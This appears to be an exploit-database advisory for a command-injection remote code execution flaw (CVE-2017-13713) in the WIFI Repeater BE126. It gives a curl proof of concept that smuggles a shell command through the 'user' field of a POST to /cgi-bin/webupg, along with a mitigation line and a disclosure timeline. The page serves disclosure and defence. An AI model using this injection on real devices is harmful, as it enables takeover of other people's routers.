WIFI Repeater BE126 – Remote Code Execution

vendor:

WIFI Repeater BE126

by:

Hay Mizrachi, Omer Kaspi

8,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: WIFI Repeater BE126

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: YES

Related CWE: CVE-2017-13713

CPE: a:twsz:wifi_repeater_be126

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows/Ubuntu 16.04

2017

WIFI Repeater BE126 – Remote Code Execution

HTTP POST request that contains user parmater which can give us to run Remote Code Execution to the device. The parameter is not sanitized at all, which cause him to be vulnerable.

Mitigation:

Sanitize user input to prevent Remote Code Execution.

Source

Exploit-DB raw data:

# Exploit Title:  WIFI Repeater BE126 – Remote Code Execution
# Date Publish: 09/09/2017
# Exploit Authors: Hay Mizrachi, Omer Kaspi

# Contact: haymizrachi@gmail.com, komerk0@gmail.com
# Vendor Homepage: http://www.twsz.com
# Category: Webapps
# Version: 1.0
# Tested on: Windows/Ubuntu 16.04

# CVE: CVE-2017-13713

1 - Description:

HTTP POST request that contains user parmater which can give us to run
Remote Code Execution to the device.
The parameter is not sanitized at all, which cause him to be vulnerable.


2 - Proof of Concept:

curl -d "name=HTTP&url="http://www.test.com&user=;echo hacked!! >
/var/mycode;&password=a&port=8&dir=a"
--cookie "Cookie: sessionsid=XXXXX; auth=ok expires=Sun, 15-May-2112
01:45:46 GMT; langmanulset=yes;
sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us"
-X POST http://beconnected.client/cgi-bin/webupg

3 - Timeline:

29/4/2017 – Vulnerability Discovered.
29/4/2017 - Vendor not responding.
03/09/2017 – Exploit published.